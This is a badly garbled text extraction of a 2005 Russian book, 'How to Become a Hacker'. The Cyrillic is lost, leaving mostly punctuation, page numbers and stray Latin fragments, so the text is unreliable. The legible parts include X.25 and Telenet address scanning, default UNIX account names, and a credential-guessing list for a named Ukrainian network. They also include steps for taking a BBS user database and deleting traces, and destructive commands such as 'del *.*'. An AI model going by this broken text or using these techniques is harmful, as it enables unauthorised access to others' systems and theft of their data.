Maxim Levin. How to Become a Hacker

  • ,

    2005

  • 004.056 32.973.202

    36

    .

    36 : / . - 3- . - .: , 2005. - 320 .

    ISBN 5-9643-0049-9 -

    . 2000 . -. ,

    , ,

    , - .

    -

    . , ,

    .

    .

    , ,

    , .

    ,

    , .

    ,

    , UNIX ftpd ftp, , , ,

    Internet, DNS- Internet .

    , ,

    , ,

    ,

    .

    Windows NT, Linux Unix .

    , .

    , , , , , .

    -

    ,

    . ,

    .

    , ,

    . ,

    -,

    ,

    .

    004.056 32.973.202

    ., 2005 -, 2005

    ISBN 5-9643-0049-9 , 2005

  • ... 3

    ,

    - . :

    , . -

    .

    , .

    , - , ,

    ,

    ,

    (cracker) . .

    ,

    . .

    .

    ... , ,

    . - , .

    ! , , ; . , - . - .

    ; , .

    ,

    ...

  • 4 ...

    ...

    , 2 , .

    , , .

    : , .

    : , , , -.

    : , , , -, ,

    , .

    , ,

    , : , .

    , : ,

    , , .

    , , .

    , : , Windows , c .

    : , , . ,

    , , ; .

    .

    . : : ?

    : , Windows , c .

    : , !

    , Windows, , . ,

    , ,

  • ... 5

    ; , , .

    ,

    : ? : , . :

    ? ? : , , , ,

    .

    : ? : .

    : , ,

    ,

    : ,

    .

    : ,

    ,

    , .

    : , ,

    ; ; ; . ,

    .

    General protection fault.

  • 6

    1. ?

    ,

    , .

    , ,

    .

    , ,

    ,

    -

    ARPAnet. . Internet. Unix , . Usenet. World Wide Web. ,

    , , , - .

    -. ,

    , . ,

    .

    ,

    , ,

    .

    , ,

    .

    ,

    , . ( , , ), .

    .

    , .

    , ,

  • 7

    ,

    .

    ,

    ,

    .

    : , .

    , .

    , - alt.2600 ,

    , , .

    - ,

    , ,

    .

    - ,

    ,

    .

    , , ,

    .

    .

    , 9 10 , -

    ,

    ( exploit). ( 10% ).

    - ,

    . , -,

    , , ,

    ( ). ,

    -

    .

  • 8

    ,

    . ,

    ,

    , : , .

    - ( , ) , , . -

    . , -,

    : rm -f-d *, del *.*, format : /U .., , -, .

    , -

    .

    , (

    ). ,

    , ,

    , , .

    - (, , ), - ,

    ,

    .

    ( ). Internet ,

    Web-, . -

    (, , ..). , , , -

    .

    - ,

    ,

    - ,

  • 9

    . ,

    , ,

    : ,

    . ,

    ,

    .

    , ,

    ,

    . , ,

    , . , , -

    , .

    , , , . ,

    , ,

    , ,

    .

    ,

    , -

    ,

    .

    -

    , ,

    ,

    : , (registration key) - ..

    , ,

    . ,

    , . ,

    ,

    - - .

    - !

    . ,

    -

    ,

    ! , - , -

  • 10

    . ,

    -, ,

    . , .

    ,

    ,

    .

    ,

    , ,

    . . ,

    , ,

    .. . . .

    , ,

    .

    !

    32- ,

    , 70- , . .

    ,

    . .

    ,

    -.

    ; .

    ,

    . , ,

    , .

    -,

    .

    ( ) $10 . , .

    , ,

    , . , ,

    . ; -

  • 11

    , -

    , , ! 8 ,

    . ,

    ,

    .

    , ,

    ,

    .

    ,

    . ? , ! , ,

    . , ,

    ,

    . , ,

    ?!

    , ,

    . 90- , , ,

    ( ) !

    .

    ,

    . ,

    , ,

    , .

    ( !). , , -

    .

    ; , , , !

    . . .

    ,

    70- . ,

    .

  • 12

    2.

    ,

    . ,

    , ,

    . , ,

    , .

    , .

    , , - ,

    .

    , -

    , ,

    .

    ,

    , :

    ,

    .

    - ,

    , .

    . -

    ,

    , .

    , ,

    , ,

    .

    ,

    , , .

    ,

    , , .

    -

    . , , ,

    , ,

    , ,

    - , .

    .

  • 13

    - .

    ,

    .

    , ,

    - , ,

    .

    , ,

    ,

    .

    ,

    , , , -

    .

    , ,

    .

    , ,

    , , , .

    - .

    ( ) ,

    , ,

    , , - .

    . -

    , .

    , ,

    ,

    , , ( ).

    ,

    ,

    .

    ,

    . ,

    .

    - .

    -. ,

    ,

    , . ,

    , -

    , .

  • 14

    , ,

    .

    , .

    , .

    - ,

    , ,

    . , -

    .

    .

    , , .

    , ,

    , ,

    .

    .

    .

    , ,

    . , ,

    , -

    -. , , ,

    , .

    , .

    , ,

    ,

    . ,

    . -

    , ,

    .

    ,

    , .

    , .

    , .

    3.

    - , -

    . , -

  • 15

    , ,

    .

    ,

    . ,

    , , ,

    HTML. :

    .

    , , .

    ,

    Python. , . ,

    , . ,

    .

    ,

    ( ), .

    , .

    , ,

    ,

    , . ,

    .

    ,

    , Unix ( , ). - Perl LISP. Perl : web- , Perl, . LISP , , .

    ,

    LISP.

    , , (Python, , Perl, LISP). , , ,

    .

  • 16

    , , - .

    , (, , - ). , .

    -

    . -

    - , ; , ; , ... ,

    .

    ,

    ,

    .

    : , ( ) . ...

    Unix , .

    ,

    . ,

    , - Linux BSD-Unix, .

    , , Unix. -

    . ,

    DOS, Windows MacOS - , .

    , Unix - Internet. Internet Unix, Internet-, Unix. Unix-. ( , , Unix Internet , Microsoft , .)

    Unix, Linux, ( -, Linux, DOS/

  • 17

    Windows ). . . . Internet. . .

    ( , Lisp Perl), Microsoft . , ,

    ,

    -.

    World Wide Web HTML.

    , ,

    , ,

    - --

    . WWW - , - , .

    ( ) Web.

    ,

    ( ), HTML, Web. , HTML , - .

    .

    , . Web - . - ,

    . , ,

    .

    , -

    . / .

    4.

    , -

    . ,

    , - ,

    ( ) .

  • 18

    , ,

    ,

    ( , ). -, ( , ), , -

    .

    , - ,

    . ,

    , , , ,

    , . ,

    . , ,

    .

    , ,

    :

    .

    ( ) - , ,

    .

    -

    (free software), , ,

    -.

    , open-source software.

    - ,

    ,

    , ,

    .

    .

    ,

    .

    .

    , - (, , ,

  • 19

    ) .

    .

    ,

    , , -.

    ,

    .

    , .

    .

    -

    Web- (FAQ, ) .

    ,

    .

    .

    ( Internet, ) . , , ,

    : , ,

    , RFC .

    , , ,

    ,

    , .

    .

    .

    , (, ). ,

    .

    ,

    , , .

    ,

    .

  • 20

    : ,

    . ,

    , ,

    ,

    .

    5.

    , ,

    . , , ,

    .

    ,

    .

    -

    .

    ,

    - , . .

    -.

    , ,

    .

    ,

    , , . ,

    . - , ,

    .

    6.

    , ,

    . , ,

    . ( ), , , -

    .

  • 21

    .

    ( --).

    - / . ( , , ).

    .

    .

    - .

    .

    . (, .)

    ,

    , .

    - ,

    ,

    ( ,

    ). , , , .

    .

    Usenet ( - ).

    -

    , .

    ,

    .

    , ,

    , - . ,

    , .

    7.

    .

  • 22

    .

    60- , , . , ,

    ,

    .

    .

    ...

    . -,

    , Analog, Scientific American Smithsonian, - .

    ,

    ,

    .

    , ,

    , .

    - - ,

    . ,

    . - -

    .

    , .

    -

    ,

    ,

    . , ,

    ,

    .

    , ,

    .

    -

    .

    .

    , ,,

    , .

    ,

    ,

    .

  • 23

    ,

    ,

    ,

    . , ,

    , , .

    ,

    ,

    ,

    .

    ...

    16 22 , ,

    . , ,

    ,

    , .

    : - , , , ,

    ,

    - .

    - , ,

    .

    - .

    , - ,

    ,

    , , .

    shareware freeware, PGP (Pretty Good Privacy) - , SATAN ( ) - , ,

    -

    , .

    Internet - .

    , ,

    .

    , , -

  • 24

    ,

    , ,

    , .

    ,

    .

    ,

    . ,

    70- .

    .

    - ,

    ,

    . ,

    -1.

    , , ,

    , .

    . 80-

    , IBM. , (Electronic Frontier Foundation), - - Lotus 1-2-3,

    .

    , ,

    , Internet - 50 . , Internet, , , - ..

    ,

    - .

  • 25

    BBS (Bulletin Board System - ), USENET, 80- ( User's Network - ) - .

    : . USENET - ,

    ,

    .

    .

    -

    Internet, .

    8. ?

    .

    . ,

    , , .

    . ,

    .

    .

    .

    .

    Internet. . .

    Internet.

    . ,

    -

    -

    , , ,

    Web- .

    , HackZone - . ,

    ,

    ,

    .

  • 26

    ,

    ,

    . - : -,

    Windows NT, , Pepsi-Cola... , , .

    -

    .

    . ,

    .

    - xpress.ru , D2MAC. D2MAC - , - .

    ,

    , -...

    , -

    , -

    Internet, , . ,

    Internete, ! , D2MAC , ,

    , .

    Windows NT , , , ,

    . NT Security, ,

    Windows NT - ,

    . ,

    , ,

    Windows NT ,

    , NT Security , .

    Windows NT -

    , .

  • 27

    : , ,

    -,

    ,

    . ,

    , ,

    - ,

    .

    Happy Hackers Guide - - .

    Internet ,

    .

    ,

    ,

    .

    , ,

    : Internet-, , .

    ,

    .

    hacked.net ,

    . : , ,

    .

    .

    - , , 2600.. , ,

    ,

    .

    10 , - 1984 ( , , ). 1987 1995-. .

    , , ,

    -

    .

    -

    .

  • 28

    -

    -, , .

    ,

    -

    ,

    !

    L0pht ( ) Heavy Industries - , ,

    2600. - L0phtCrack 2.0, , Windows NT.

    ,

    ,

    , Mondo 2000. , -

    . ,

    - , - -

    . , , ,

    : ,

    L0pht . , -

    .

    Nomad Mobile Research Centre - -

    : Windows NT, , , .

    ,

    Novell. Compute .

    ? -,

    , .

    ,

    Internet , -

    . ,

    , .

    ,

    , , , - .

  • 29

    9. -

    ,

    , .

    , , ,

    , .

    .

    ,

    . ,

    .

    , ,

    .

    (

    , ,

    ). ,

    .

    ,

    ; , ,

    !

    ,

    ,

    -.

    , ( ) , .

    ; . , . ,

    , .

    , ,

    ,

  • 30

    , , , .

    .

    ,

    .

    ,

    -Z -S. Internet, .

    Internet , . , , -

    ,

    .

    , . ...

    !

  • Internet Intranet 31

    Internet Intranet

    1. ,

    Internet - , ,

    : . Internet TCP/IP, :

    IP (Internet Protocol) - ,

    ;

    UDP (User Datagram Protocol) - ,

    IP ;

    TCP (Transmission Control Protocol) - ,

    IP .

    , Internet, IP-.

    Internet- : . ,

    ; (routing). . , IP- ( ), , 194.85.31.20.

    2. (DNS)

    DNS (Domain Name System) - ,, ,

    Internet. ,

  • 32 Internet Intranet

    , IP- . ,

    . ,

    - IP- .

    DNS , , .

    , ( ). .

    , , , :

    .gov - ;

    .mil - ; - ;

    .net - ;

    .org - ;

    .edu - . ,

    , ISO. : www.spm.ru - ;

    www.berlin.de - ; www.hotex.nl - .

    3. Internet

    Internet ., :

    ping - .

    traceroute - ( Windows 95 Windows NT - tracert.exe).

    nslookup - DNS-.

  • Internet Intranet 33

    telnet - (23 ) .

    ftp - FTP (File Transfer Protocol) (21 ).

    finger - , - .

    WWW (World Wide Web) Netscape Navigator, Internet Explorer . (80 ) HTTP.

    : ftp, telnet, finger www , , ,

    -.

    4. Internet

    , ,

    .

    , ,

    Internet, , . , .

    Internet . :

    - ( , ) Internet, ( ) .

    Internet, - ,

    .

    (?! Internet?! WWW server ?! ?! ! Internet!)

  • 34 Internet Intranet

    - ,

    , Internet.

    ,

    .

    - .

    ,

    Internet, .

    :

    , ,

    , .

    - :

    Internet ( ). ,

    ,

    , .. ,

    Internet.

    ,

    Internet , ,

    X.25 ( SPRINT).

    5.

    X.25 (), . ,

    , .. ,

    , .

    ,

    -.

    , . -

  • .Internet Intranet 35

    (),

    .

    NUA (Network Users Address/ ) , .

    NUI (Network User Identificator/

    ) .

    .

    DNIC (Data Network Identification Code/ ) 4 ,

    .

    PAD (Packet Assemble Disassembler// ) ,

    , ..

    , .

    X.25 X.25 (

    Telemate Telix). , ,

    ,

    .

    ,

    , .

    ,

    . ,

    , .. _

  • 36 Internet Intranet

    . , ,

    -

    ,

    .

    : . ,

    . ,

    .

    .

    , -

    , CTRL-P. :

    CON - X.25; LOC - ; CLR - ; PAR? - .; SET - .; SET? - .

    ;

    PROF - .;

    INT - ;

    RESET - ; STATUS - .

    :

    - ;

    ERR - ;

    RESET - ; FREE - STATUS

    ;

  • Internet Intranet 37

    ENGAGED - STATUS ;

    CLRCONF - ;

    CLR - :

    DTE DTE ;

    1 ;

    3 INV - ;

    5 NC - ; 9 DER - ; 11 NS - ; 13 NP - ;

    17 RPE - ;

    19 ERR - ; 21 PAD - ;

    25 NRC - ; 33 INC - ;

    41 NFC - ;

    128 DTE - ;

    129 DTE - DTE ; 130 DTE - ; 131 DTE - DTE X.28;

    132 DTE - DTE ; 133 DTE - DTE ;

    134 DTE - ; 135 DTE - ; 136 DTE - X.25; 137 DTE - DTE ;

    138 DTE - .

  • 38

    1.

    -

    .

    , .

    . ? . ,

    , .

    ,

    , .

    .

    !

    2.

    ,

    . , , .

    , ,

    .

    , .

    , ,

    , , -

    , ,

    - .

    ,

    .

    ,

    .

    , :

    1. , , .

    2. .,

  • 39

    FDM, , !

    3. , :

    ) ; ) ; )

    MA BELL.

    ! - ,

    . , ,

    .

    ,

    , ,

    ( ). , (.. ) .

    4. .

    5. - , , .

    , , ,

    , ,

    , .

    3.

    . ,

    .

    ,

    , .

    , .

    , ,

    - .

    .

  • 40

    ,

    90V at 20-30Hz

    30-50V

    600V. ! MOV. .

    . ,

    , ,

    , , .

    4.

    .

    . ,

    33 , .

    ,

    . , ,

    , .

    , , ,

    ... -

    . ,

    ! - ,

    .

    5. FI

    ,

    , - .

    .

    .

    RFI ,

  • 41

    .

    ,

    . , , ,

    !

    6. ESS

    - Electronic Standardized Switching ( ESS), . ? ,

    . ! - . , , ,

    .

    55 . , ! , -

    . ! ESS . ,

    , . , , ESS , .

    ! !

  • 42

    1. !

    ,

    , .

    , ,

    : , ,

    , .

    ,

    .

    ,

    .

    2.

    , . 50- (MIT) .

    . , ,

    . -

    ,

    . ,

    , ,

    ,

    .

    .

  • 43

    ,

    ( , ..)

    ,

    ( ,

    ID , ) ,

    .

    .

    , ,

    ,

    ,

    .

    -

    .

    : , ,

    , .

    3.

    -

    Telenet. ? -, , . -,

    . -,

    Telenet, . ,

    . - ,

    , ,

    .

    , ,

    .

    Telenet , , , Telenet Tymnet, ItaPAC, Janet, DATAPAC, SBDN, PandaNet, THENET .

  • 44

    , , -

    . , :

    =

    - type . vt100 , . ,

    -.

    @. :

    @ mail . phones

    . ,

    phones. , - . , dialup. local dialup,

    =

    @. , Telenet PAD. PAD / ( ), Public Access Device ( ). .

    Telenet , , PAD, , 128 (, ) 9600 19 200 PAD, ,

    . PAD , ,

    . .

    PAD , .

    PAD? , ,

    (NUA) , .

    ,

    refused collect connections , ,

    @ prompt.

  • 45

    , - Refused Collect. - ID (NUI). NUI - /pw , Telenet.

    ,

    PAD - Netlink . Telenet NUA ( ) , ( 713 , .) , , , - ( 914), :

    @> 914 001

    ,

    914 002. , - .

    .

    (914 2354), (422 121 = 422 121.01). , , .

    . , 512 , 512 00000.00 512 00000.99, 1 512 00001.00 512 00001.99. !

    , .

    .

    , ,

    @ prompt

    D .

    Outdials , NUA

    .

    - outdial. Outdial - , telenet - PC, , .

  • 46

    ,

    Hayes 1200 outdial, Detroit, MI

    VEN-TEL 212 Modem ,

    Session 1234 established on Modem 5588 ,

    H Help - , .

    -

    - , outdial diverter, . .

    , outdial, - , . ,

    , - (Redial last number). , . ,

    . - -

    . VENTEL- D, , .

    , , X.25 Communication PAD, , @. PAD, , , , ,

    PAD, , .

    PAD PAD, , . ,

    Telenet, 212 44 Connected

    212. , 44 PAD 212 . 21244 .

    PAD, , , .

    .

  • 47

    4.

    , ,

    . ,

    , : ?

    , ,

    - .

    ,

    , ,

    .

    VMS VAX- Digital Equipment Corporation (DEC)

    VMS ( ) . VMS : USERNAME

    ,

    ,

    .

    .

    - ,

    ,

    . VAX . HELP .

    DEC-10 DEC-10 - DEC,

    TOPS-10 . ..

    DEC-10/20 , - .

    [, ], - .

    .systat ( ).

  • 48

    [234,1001] BOB JONES, JONES . , :

    .login xxx,yyy , , .

    .

    , UIC, (UIC = ) .

    UNIX ,

    UNIX.

    ,

    , .

    UNIX login: . UNIX

    ( ), , .

    Prime Prime, ,

    Primos. Primecon 18.23.05 - ,

    . . ,

    ,

    login

    18.00.00 Primos, ^ . , 19 +. Primos . Prime Telenet - NETLINK. - , NETLINK, . NUA ' , nc.

    , NUA 026245890040004,

  • 49

    @nc:26245890040004 netlink.

    -

    Hewlett-Packard. :. HEWLETT-PACKARD - :

    HELLO SESSION NAME, USERNAME, ACCOUNTNAME, GROUP

    ,

    . -

    , - ,

    ,

    . , ,

    , .

    - ,

    :, , .

    IRIS IRIS Interactive Real Time Information System (

    ). PDP-11's, - -.

    Welcome to IRIS R9.1.4 Timesharing

    ACCOUNT ID? Iris

    .

    VM/CMS VM/CMS - , IBM (Interna

    tional Business Machines). , ,

    VM/370 ONLINE ., Tops-10. ,

    :

    LOGON .

  • 50

    NOS NOS Networking operation system

    Cyber, Control Data Corporation. NOS ,

    WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978,1987

    , ,

    FAMILY:

    return. user name:

    - 7 - . , 7-DOC.

    Decserver , , , ,

    , ..

    Decserver : Enter Username>

    . - .

    , - .

    Local>

    .

    sh services

    sh nodes - ,

    help. modem, dial, - , !

    GS/1 GS/1 - . Decserver,

    , GS/1 . :

  • 51

    GS/1 > .

    GS/1, :

    ( , , , ..), , GS/1. , Decserver, :

    < systemname > , , :

    sh n

    sh - ,

    . ,

    , .

    5.

    . -

    : ,

    .

    , .

    () .

    ToneLoc v1.10 . - -

    . , ,

    , ?

    Cracker Jack v1.4 . ,

    .

  • 52

    Hacker's Utility V1.02 .

    :

    port scanner

    finger lookup file extractor !

    CyberKit v. 2.4 :

    Trace Route

    WhoIs Finger

    Name Server Look Up Time Synchronizer

    Quote of the Day . PGP Freeware v5.0

    .

    ? ? , ! , . , ,

    !

    7th Sphere PortScan v1.1 7th Sphere.

    .

    :

    1. , . . -

    , - , .

    ,

    , .

    !

    2. , , - (C++, Perl, JavaScript ).

  • 53

    Unix, TCP/IP . , ...

    6 ( ).

    1. , ( ), . ,

    .

    , ,

    , ; , . ,

    ,

    . , ,

    , , .., , ,

    , , .

    2. 20:00 ( !) 00:00 . , , . ! , , . 00:00 , , 00:00 .

    - . ,

    ( 00:00-03:00). - ,

    , , -

    .

    3. , - , ( ) /, , ,

    . , , /r, , . -

    ...

    4. , - ..

    GO ADMINi

  • 54

    , , -

    ( ). .

    5. ,

    . .

    6. , - , n' ( -) . - / , .

    7. -, , - ( ). / ?.

    -

    . ,

    , -

    . .

    .

    . . ,

    , , ? , ,

    ,

    .

    , , -

    .

    ,

    . , ,

    .

    ,

    .

  • 55

    Display ANSI graphics ([Y]/N)? > [...- ( ). . . ] UserID : Password:

    ENTER YOUR NAME = > PASSWORD = > LANGUAGE = >

    REX400 Logical Channel: 0 REX400 v4.54.02, Copyright (C) 1992-1996, Club400 Ltd.

    M) Mail H) Help G) Gateway Q) Quit Hult i Host>

    CISCO- User Access Verification Password: ,

    , :

    (UserID/Password):

    , :

  • 56

    Demo1/Demo1 ..,

    . .

    ( ) .

    - , :

    UUCP/UUCP ,

    .

    UUCP/PCUU , .

    UUCP/UUADMIN

    , .

    , , , - .

    , :

    , -

    . - .

    ID ,

    .

    . , -

    .

    .

    , :

    reg

    registry

    onboardl onboard - .

    , MAIN (GO MAIN TREE, TYPE LIB TYPE LIBS TYPE LIB-TREE.

    1 - .

    , 6100255 , ,

    ,

    , .

    , ID . , ,

    , ,

    ID. , ID . ID , , / /, 10-15 ID. (/ ). . -

    .

  • 58

    ,

    - .

    :

    1 - ( ). 2 - ( ). 3 - (

    .

    , ,

    , .

    .

    ,

    :

    ,

    .

    .

    .

    8 .

    .

    , .

    , ,

    , .

    ( Demo Demo). , Demo/Demo, .

    ( - ): ! , ,

    ,

    .

    206-85-70 924-74-85

  • 59

    ID Password. ( ). !

    , , -

    .

    .

    , ( ) ID , ID. .

    :

    / / / / Ukrpack / / (0482) 33-31-78/ /. :

    Ukrpack/Ukrpack

    Ukrpack/Kcaprku -

    Ukrpack/ Andrew -

    Ukrpack/Andy-

    Ukrpack/Andrey- Ukrpack/Fylhtq - (

    ) ' Ukrpack/Kfpfhtd - (

    ) Ukrpack/Vbffqkjdbx- (

    ) Ukrpack/Lam -

    Ukrpack/Aml -

    Ukrpack/Mal -

    Ukrpack/Lma -

    Ukrpack/333178 -

    Ukrpack/Telnet -

  • 60

    Ukrpack/Ntkytn - ( )

    Ukrpack/Odessa - (, )

    Ukrpack/Jltccf- ( )

    , -

    - .

    -

    ,

    .

    () . ,

    :

    X = S

    X - , S - , , - . ,

    ,

    , ( ). , ,

    ( qwerty secret), -, - ( ) . : - . /U

    :

    .

    .

    Capture. :

    / /

    / , - -

    ID , '.

  • 61

    .

    < / ? / ?.

    . ,

    .

    :

    - , ..

    ,

    , , .

    !

    - , -

    .

    . ,

    , - - .

    N (.. ') . , N , . ,

    , , ,

    Z ( --).

    :

    , , .. ,

    ...

    USRACC.DAT ,

    dat\usracc.dat , , , ,

    .

    , (, , ) , , . ,

    30 000 (, ).

    usracc.dat, .

  • 62

    1 usracc.dat,

    ( usracc.dat ).

    ,

    usracc.dat . ( !) , . 6100255 .

    2 ,

    . ? , ?; ml, . :

    1. , : , , :

    ml /d /d , dos-.

    :

    :\> cd dir

    ( \remart \remart.40, ).

    ,

    ()

    , d:, .

    .

    i: ,

    , d, e, f, g, h, i, ...

    2. , usracc.dat dat. He type - - , - ,

    .

  • 63

    3. remart.bat . ,

    .

    , .

    pause - , , ,

    pause, , .

    remart.bat cleanup.bat, .

    remart.bat . cleanup.bat - !

    remart.bat - DOS batch file missing, .

    4. cleanup.bat type cleanup.bat .

    del cleanup.bat -

    type cleanup.bat , ; ( )

    :

    C:\REMART.40\DAT\USRACC.DAT :\ remart.40 ,

    ,

    .

    5. . , , , .

    hangup, , ,

    -

    , .

    , ( ), cleanup .

  • 64

    6. , remart.bat , cleanup.bat ( ) .

    , .

    ( ). 7. . ,

    usracc.dat, , del ( !..) . cleanup.bat.

    8. rl _ 9. -...

    ,

    .

    ,

    (!) . admin/admin, , ,

    adminoM. .

    :

    1 - . : Display ANSI

    Graphics ([Y]/N)? >, @. . :

    Login: Password: ,

    Enter. (10-20 .) . , ,

    .

    @ - . , (5-6 .).

    2 - .

    . / ( ) -

  • 65

    , Enter ! ,

    ( ). . ,

    , .

    - .

    3 - . ,

    .

    (, dir). . 4

    - .

    . - : /

  • 6 6

    ,

    :

    /off , :

    ...

    , , 6100255 .

    , , Enter - , ( , ) . - /, / ..

    ,

    , go chattop, - () / 1. -

    ,

    , / 1, , . ,

    , /, F+++ - , .

    :

    1. PROTECT ( ) - , , -

    .

    2. , SQRT ( Security), , , Alt+251 (v), . Demo - , . ? v , : SQRT ( , , Eclipse protection mode - 80286 -

  • 67

    ). - - remstart.com , RE-MARTL.EXE , , .

  • 78 Unix

    Unix

    1.

    UNIX, , AT&T - 60- . , UNIX, , , , , , UNIX . ,

    . , ,

    , .

    , - IBM , ? , UNIX . , ,

    UNIX ( UNIX, , ). AT&T UNIX, - (AT&T 6300). Sun SunOS, UNIX, VAX- Ultrix, VAX- UNIX. : , (BSD, UNIX, SunOS, Ultrix, Xenix ..), , .

    , , ,

    . -

    , UNIX ,, , , , ,

    . , ,

    UNIX VAX , - IBM-. , , ,

    , VAX, VMS.

    2. Unix

    UNIX UNIX, - UNIX, , , ( Unix System V

  • Unix 79

    BSD, SunOS, Ultrix, Xenix ..), .

    , unix . , UNIX , , :

    Login:

    . , , , Unix, BBS, login- OS ( ) , Unix. (Xa!) Unix'bi Login: :

    Welcome to SHUnix. Please log in.

    ( SHUNIX. ) Login:

    - . Unix'bi (, BBS ) , , - . , Unix'ax , ,

    UUCP/USENET/BITNET .

    . (login)! (account). 8 . , ,

    . ,

    UNIX . , : .

    .

    :

    ACCOUNT root sys bin mountfsys adm uucp nuucp anon

    root - ( ) sys / system / bin sys / bin mountfsys adm uucp anon

    anon

  • 80 Unix

    user

    games install reboot demo umountfsys sync admin guest daemon

    user games install * ni. ie?a demo umountfsys sync admin guest daemon

    root, mountfsys, umountfsys, install , , sync - . ,

    .

    , ,

    /, . REBOOT , , -

    . , ,

    , - . ,

    , UNISYS, HP/UX (Hewlett Packard Unixes). , .

    , ,

    (reboot), , .

    BSD MIT ( ). :

    rwho - ,

    finger - w h o -

    ,

    .

    / , , . login incorrect.

  • Unix 81

    , ,

    , ,

    .

    , . ,

    , ,

    .

    - Cannot change to home directory Cannot Change Directory. home directory, , , . :\ :\, -, - /homedirectory. (: / ( ), \ ( )). , ,

    ['/']. No Shell. ,

    shell, . .

    , ,

    () , Using the bourne shell Using sh.

    .

    ,

    .

    , , : .

    .

    .

    . .

    UID ( ) . UID 0 ().

    UID = 0 . (), . , UID = 50, - UID 50, , , .

  • 82 Unix

    4.

    - ,

    ,

    . ,

    passwd. . . ,

    , - ( ). - , COMMAND.COM MS DOS, ( ). , ,

    . , :

    sh - , COMMAND.COM Unix. , Unix.

    csh - , - .

    ksh - korn. .

    tcsh - , MIT. .

    vsh - , . ... Windows DOS. rsh - restricted () remote () .

    , ,

    , Unix Unix, . , , ,

    , .

    Eskimo North, Unix . Esh, BBS, , , .

    , -

    .

  • Unix 83

    , BBS.

    ,

    :

    $ ,

    :

    #

    PS1 . , PS1 HI:, :

    HI:

    5.

    Control-D .

    , .

    control-d, , .

    Control-J .

    @ .,

    ? wildcard (). .

    , , b?b, Unix bob, bib, bub, / a-z, 0-9.

    . *,

    hit, him, hiiii, hiya , hi. H*l hill, hull, hi , h 1.

  • 84 Unix

    . b[o,u,i]b, : bib, bub, bob. b[a-d]b, : bab, bbb, bcb, bdb. [], ? *

    .

    Unix . , Hill hill - . , Hill, hill, hill, hili . , [], , . ..

    6.

    Unix. ,

    .

    ls .

    , ,

    ls .

    :

    $ ls
    hithere runme note.text src
    $

    -l :

    $ ls -l
    rwx--x--x sirhack sirh 10990 runme ...

    :

    rwx--x--x - .

    sirhack sirh - , , sirhack = , sirh = , .

  • Unix 85

    10990 - . runme - .

    cat . .

    . :

    $ cat note.txt !

    $ cd (). : cd

    /dir/dir1/dir2/dirn. dir1/... - . , :

    $ cd /

    ., *

    $ ls
    bin sys etc temp work us

    , , , -

    $ cd /usr
    $ ls
    sirhack datawiz prophet:
    violence par phiber scythian
    $ cd /usr/sirhack
    $ ls
    hithere runme
    note.text src
    $

  • 86 Unix

    , .

    (), (, src), cd src [ /]. cd /usr/sirhack/src sirhack dir cd src.

    .

    : cp _ _

    $ cp runme runme2
    $ ls
    hithere runme note.text src runme2

    , .

    $ cp runme /usr/datwiz/runme

    mv

    .

    : mv _ _

    $ mv runme2 runit
    $ ls
    hithere runme note.text src runit

    :

    $ mv runit /usr/datwiz/run
    $ ls
    hithere runme note.text src
    $ ls /usr/datwiz
    runme run

  • Unix 87

    pwd

    $ pwd
    /usr/sirhack
    $ cd src
    $ pwd
    /usr/sirhack/src
    $ cd ..
    $ pwd
    /usr/sirhack
    (.... )
    $ cd ../datwiz
    ( cd /usr/datwiz)
    $ pwd
    /usr/datwiz
    $ cd $home
    ( home)
    $ pwd
    /usr/sirhack

    rm .

    : _ rm - _

    $ rm note.text
    $ ls
    hithere runme src
    $

    write . ,

    .

    : write _*

    $ write scythian
    scythian has been notified (scythian )
    Scy! ??
    Message from scythian on tty001 at 17:32
    ! : ? scy: .

  • 88 Unix

    : .

    scy: ok : control-D [ ]
    $

    who (w, who, whodo) , :

    $ who
    login     term     logontime
    scythian  + tty001 17:20
    phiberO   + tty002 15:50
    sirhack   + tty003 17:21
    datawiz   - tty004 11:20
    glitch    - tty666 66:60
    $

    who . + ,

    write , - - .

    man .

    : man _. . , who, :

    $ man who
    WHO(1) xxx .

    stty . man stty,

    stty, , . : $ stty -parenb ,8,1. Unixno

    ,7,1.

    sz, rz / zmodem.

    , S X / xmodem.

  • Unix 89

    rb, sb / batch () ymodem.. 6 Unix , .,

    umodem / send/receive via umodem.

    $ sz filename
    ready to send...
    ( ... )
    $ rz filename
    please send your file...
    (, . . . )
    ...etc..
    ( ..)

    ed .

    : ed_.

    ed _ $ ed newtext

    *

    1 2 [control-z] * 1 [ 1] 1 * [ ] 3 [control-z] [ 0]

    [control-z] 1,41

    1 2 3 * w 71 * q $

  • 90 Unix

    :

    *

    *

    71 - .

    -

    1 -

    # -

    w -

    1 fname - fname

    s fname - fname

    w -

    q -

    mesg / (write)

    ( ). : mesg () mesg n ().

    .

    chmod . , .

    : chmod mode filename (chmod _)

    $ chmod a+r newtext

    newtext:

    - all () - read ().

    chown .

    : chown filename

    $ chown scythian newtext

  • Unix 91

    chgrp .

    : chgrp group file

    $ chgrp root runme
    $

    finger .

    : finger _

    .

    : grep file $ 1 newtext 1 $ newtext

    $ " line 1" newtext $

    mail . ,

    . , , ELM, MUSH MSH, mail. :

    mail username@address

    mail username

    mail

    mail addrl!addr2!addr3!user mail username@address -

    - . UNIX, DOS- VAX- Unix Mail. mail user@address; , .

  • 92 Unix

    .

    :

    mail phibereoptik

    :

    mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber . .,

    , ,

    . ,

    phiber. , :

    $ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber
    . ? , . , ?
    (control-D)
    $

    , 20

    , ,

    , :

    From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack

    mail username, username - .

    control-D.

    mail. To : $ mail : scythian : sirhack : W e l l . . . . , ! ? .

    mail .

    - . :

    d -

    f username - username

    wfname - fname


    s fname - fname

    q - / mail

    - ,

    m username - username

    -

    4 [enter] - + -

    -

    h - .

    . ,

    .

    - ,

    ,

    - .

    UUCP. UUCP - UUCP, .

    ps . ,

    .

    (PID), , -

    . ps . , sirhack, csh, watch scythian. watch , - ,

    :

    $ ps
    PID TTY NAME
    122 001 ksh
    123 001 watch
    $

    PS, .

    TTY tty ( /),


    process. , (!) . ps -f , watch , , watch scythian.

    kill . ,

    .

    , (, ), EUID , , . ( EUID ). , . ,

    - , - ..

    , kill 122, . kill UNIX . kill pid, UNIX , , . ,

    ! kill -num pid (num - ). Kill -9 pid - .

    $ kill 122
    $ kill 123
    $ ps
    PID TTY NAME
    122 001 ksh
    123 001 watch
    $ kill -9 123
    [123]-.killed
    $ kill -9 122
    garbage
    NO CARRIER

    kill -1 0, . .

    7.

    -

